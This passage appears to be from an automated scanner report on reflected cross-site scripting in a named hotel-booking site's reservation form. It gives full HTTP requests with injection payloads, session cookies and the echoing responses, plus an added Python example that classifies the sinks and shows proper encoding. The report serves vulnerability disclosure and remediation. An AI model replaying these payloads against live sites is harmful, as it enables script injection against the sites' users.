The value of the chargeableRoomRateTotal request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f77f"><script>alert(1)</script>c726a0130fc was submitted in the chargeableRoomRateTotal parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequency=B&nativeRoomRate=1434.2&nativeCurrencyCode=USD&extraPersonFees=&chargeableRoomRateTaxesAndFees=205.99&chargeableRoomRateTotal=1434.21f77f"><script>alert(1)</script>c726a0130fc&displayRoomRate=1434.2&NativeNightlyRates=429.49%2C429.49%2C369.23&DisplayNightlyRates=429.49%2C429.49%2C369.23&displayCurrencyCode=USD&promoType=&propertyID=15159&promoDescription=&immediateChargeRe
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:34:44 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="chargeableRoomRateTotal" value="1434.21f77f"><script>alert(1)</script>c726a0130fc">
...[SNIP]...

4.289. https://www.hotelplanner.com/Accept/Reserve.cfm [departureDay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the departureDay request parameter is copied into an HTML comment. The payload 4d76d--><img%20src%3da%20onerror%3dalert(1)>602f13b20c8 was submitted in the departureDay parameter. This input was echoed as 4d76d--><img src=a onerror=alert(1)>602f13b20c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. Note that the reflecting response here is not the booking page but the application's 503 "Page Not Available" error page: the value is written into a ColdFusion "Diagnostic Information" comment that also discloses the server-side parse failure (an invalid date string), so the unencoded sink is the error handler, and the 503 status does not stop the browser from rendering the markup it carries.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=74d76d--><img%20src%3da%20onerror%3dalert(1)>602f13b20c8&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequency=B&nativeRoomRate=1434.2&nativeCurrencyCode=USD&extraPersonFees=&chargeableRoomRateTaxesAndFees=205.99&ch
...[SNIP]...

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:33:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
<!--

Diagnostic Information:
10/74d76d--><img src=a onerror=alert(1)>602f13b20c8/2011 is an invalid date or time string. <br>
...[SNIP]...

4.290. https://www.hotelplanner.com/Accept/Reserve.cfm [departureMonth parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the departureMonth request parameter is copied into an HTML comment. The payload 9f93b--><img%20src%3da%20onerror%3dalert(1)>0bcce531657 was submitted in the departureMonth parameter. This input was echoed as 9f93b--><img src=a onerror=alert(1)>0bcce531657 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. As in 4.289, the reflecting response is the 503 error page, and the sink is its diagnostic comment, which here also discloses the failed numeric conversion of the parameter.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=99f93b--><img%20src%3da%20onerror%3dalert(1)>0bcce531657&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequency=B&nativeRoomRate=1434.2&nativeCurrencyCode=USD&extraPersonFees=&chargeableRoomRateTaxesAndFees=205.99&chargeableRoomRateT
...[SNIP]...

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:33:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
<!--

Diagnostic Information:
The value 99f93b--><img src=a onerror=alert(1)>0bcce531657 cannot be converted to a number. <br>
...[SNIP]...

4.291. https://www.hotelplanner.com/Accept/Reserve.cfm [departureYear parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the departureYear request parameter is copied into an HTML comment. The payload 5b1cb--><img%20src%3da%20onerror%3dalert(1)>a97efa02bef was submitted in the departureYear parameter. This input was echoed as 5b1cb--><img src=a onerror=alert(1)>a97efa02bef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. As in 4.289, the reflecting response is the 503 error page, and the sink is its diagnostic comment, which also discloses the server-side date-parsing failure.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=20115b1cb--><img%20src%3da%20onerror%3dalert(1)>a97efa02bef&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequency=B&nativeRoomRate=1434.2&nativeCurrencyCode=USD&extraPersonFees=&chargeableRoomRateTaxesAndFees=205.99&chargeableRoomRateTotal=1434.2&display
...[SNIP]...

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:33:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
<!--

Diagnostic Information:
10/7/20115b1cb--><img src=a onerror=alert(1)>a97efa02bef is an invalid date or time string. <br>
...[SNIP]...
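
Findings 4.283 through 4.291 above drop the same canary technique into three different HTML sinks: a double-quoted attribute value, text between tags, and an HTML comment on the 503 error page. The following Python is an added example and is not part of the XSS.CX report or of the hotelplanner.com application. It reproduces the scanner's reasoning offline: it locates the reflected canary, derives the sink context from the markup before it, checks whether the echoed characters really close that context, and then shows what correct output encoding for that context would have produced. The response fragments in SAMPLES are constructed from the snippets the report prints; the SAMPLES keys and all function names are assumptions of this example, not identifiers from the report.

```python
"""Classify where a reflected payload lands in an HTML response, check
whether that context lets it break out, and show what proper output
encoding would have produced.  Added example; the sample fragments are
constructed from the reflection snippets shown in the report above.
"""
import html
import re

# (payload as echoed, response fragment) constructed from findings 4.283, 4.284, 4.289.
SAMPLES = {
    "bedTypes attribute (4.283)": (
        'eb17d"><script>alert(1)</script>4c2a6b371af',
        '<input type="hidden" name="bedTypes" value="14|King Bedeb17d"><script>alert(1)</script>4c2a6b371af">',
    ),
    "bedTypes text (4.284)": (
        '33d6d<script>alert(1)</script>79da41cdb8a',
        '<option selected value="14">King Bed33d6d<script>alert(1)</script>79da41cdb8a</option>',
    ),
    "departureDay comment (4.289)": (
        '4d76d--><img src=a onerror=alert(1)>602f13b20c8',
        '<!--\n\nDiagnostic Information:\n10/74d76d--><img src=a onerror=alert(1)>602f13b20c8/2011 is an invalid date or time string. <br>',
    ),
}

PREFIX = re.compile(r'^[0-9a-f]+')   # scanner's random prefix canary
SUFFIX = re.compile(r'[0-9a-f]+$')   # scanner's random suffix canary

# Characters that must survive unencoded in the reflected segment to escape each context.
BREAKOUT = {
    'attribute': re.compile(r'["\']\s*>'),    # close the quoted value, then the tag
    'tag':       re.compile(r'[\s/>]'),       # start a new attribute or end the tag
    'text':      re.compile(r'<[a-zA-Z/!]'),  # open a new tag
    'comment':   re.compile(r'--!?>'),        # terminate the comment
}


def reflection_context(body, payload):
    """Return 'comment', 'attribute', 'tag' or 'text' for the spot where the
    payload's leading canary is echoed, or None if it is not echoed at all."""
    m = PREFIX.match(payload)
    canary = m.group(0) if m else payload
    i = body.find(canary)
    if i < 0:
        return None
    before = body[:i]
    if before.rfind('<!--') > before.rfind('-->'):
        return 'comment'
    lt, gt = before.rfind('<'), before.rfind('>')
    if lt > gt:                                   # still inside the last opened tag
        inside = before[lt:]
        if inside.count('"') % 2 or inside.count("'") % 2:
            return 'attribute'                    # a quoted attribute value is still open
        return 'tag'
    return 'text'


def reflected_segment(body, payload):
    """Slice of the response between the two canaries, i.e. what the server
    emitted for the submitted value; '' if the prefix canary is absent."""
    m = PREFIX.match(payload)
    i = body.find(m.group(0) if m else payload)
    if i < 0:
        return ''
    s = SUFFIX.search(payload)
    j = body.find(s.group(0), i) if s else -1
    return body[i:j + len(s.group(0))] if j >= 0 else body[i:i + 2 * len(payload)]


def assess(body, payload):
    """Mirror the scanner's verdict: sink context, whether the echo is verbatim,
    and whether the echoed characters actually break out of that context."""
    ctx = reflection_context(body, payload)
    seg = reflected_segment(body, payload)
    return {
        'context': ctx,
        'echoed_unmodified': payload in body,
        'breakout': bool(ctx and BREAKOUT[ctx].search(seg)),
    }


def encode_for_context(value, ctx):
    """Output encoding that would have neutralised the payload in this sink.
    Returns None where encoding alone cannot help: inside <!-- --> entities are
    not decoded, and an unquoted attribute needs quoting before encoding."""
    if ctx == 'text':
        return html.escape(value, quote=False)
    if ctx == 'attribute':
        return html.escape(value, quote=True)     # quotes too, or "> still closes the value
    return None


def fixed_response(body, payload):
    """The response as it would look with the right encoding applied to the
    reflected value; None when the sink cannot be fixed by encoding."""
    encoded = encode_for_context(payload, reflection_context(body, payload))
    return None if encoded is None else body.replace(payload, encoded)


if __name__ == '__main__':
    for name, (payload, body) in SAMPLES.items():
        fixed = fixed_response(body, payload)
        after = assess(fixed, payload)['breakout'] if fixed else 'n/a: remove the echo'
        print(f"{name}: {assess(body, payload)}; breakout after encoding: {after}")
```

Run as a script it prints one verdict per sample. When replaying any of the captured requests, recompute Content-Length: the report shows 1446 for every variant even though the payload lengths differ. The comment-context result is the one to take to developers: no entity encoding is decoded inside a comment, so the only fix there is to stop writing the raw parameter into the diagnostic comment, and preferably to stop emitting that diagnostic on a production error page at all.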

4.292. https://www.hotelplanner.com/Accept/Reserve.cfm [depositRequired parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the depositRequired request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e59d3"><script>alert(1)</script>79153e46eb0 was submitted in the depositRequired parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
ghtlyRates=429.49%2C429.49%2C369.23&DisplayNightlyRates=429.49%2C429.49%2C369.23&displayCurrencyCode=USD&promoType=&propertyID=15159&promoDescription=&immediateChargeRequired=true&depositRequired=truee59d3"><script>alert(1)</script>79153e46eb0&guaranteeRequired=false&rateChange=true&taxRate=205.99&propertyType=H&supplierType=H&roomTypeDescription=Superior+Room+1+King+Bed&bedTypes=14%7CKing+Bed&bedType=14&rateDescription=Superior+Room+1+Kin
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:35:35 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="depositRequired" value="truee59d3"><script>alert(1)</script>79153e46eb0">
...[SNIP]...

4.293. https://www.hotelplanner.com/Accept/Reserve.cfm [displayCurrencyCode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the displayCurrencyCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac706"><script>alert(1)</script>3aca14f8883 was submitted in the displayCurrencyCode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
geableRoomRateTaxesAndFees=205.99&chargeableRoomRateTotal=1434.2&displayRoomRate=1434.2&NativeNightlyRates=429.49%2C429.49%2C369.23&DisplayNightlyRates=429.49%2C429.49%2C369.23&displayCurrencyCode=USDac706"><script>alert(1)</script>3aca14f8883&promoType=&propertyID=15159&promoDescription=&immediateChargeRequired=true&depositRequired=true&guaranteeRequired=false&rateChange=true&taxRate=205.99&propertyType=H&supplierType=H&roomTypeDescriptio
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:35:13 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="displayCurrencyCode" value="USDac706"><script>alert(1)</script>3aca14f8883">
...[SNIP]...

4.294. https://www.hotelplanner.com/Accept/Reserve.cfm [displayRoomRate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the displayRoomRate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6daa4"><script>alert(1)</script>ff05d5905e4 was submitted in the displayRoomRate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequency=B&nativeRoomRate=1434.2&nativeCurrencyCode=USD&extraPersonFees=&chargeableRoomRateTaxesAndFees=205.99&chargeableRoomRateTotal=1434.2&displayRoomRate=1434.26daa4"><script>alert(1)</script>ff05d5905e4&NativeNightlyRates=429.49%2C429.49%2C369.23&DisplayNightlyRates=429.49%2C429.49%2C369.23&displayCurrencyCode=USD&promoType=&propertyID=15159&promoDescription=&immediateChargeRequired=true&depositRequ
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:35:02 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58861

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="displayRoomRate" value="1434.26daa4"><script>alert(1)</script>ff05d5905e4">
...[SNIP]...

4.295. https://www.hotelplanner.com/Accept/Reserve.cfm [extraPersonFees parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the extraPersonFees request parameter is copied into an HTML comment. The payload 31a57--><img%20src%3da%20onerror%3dalert(1)>ded68a36227 was submitted in the extraPersonFees parameter. This input was echoed as 31a57--><img src=a onerror=alert(1)>ded68a36227 in the application's response.

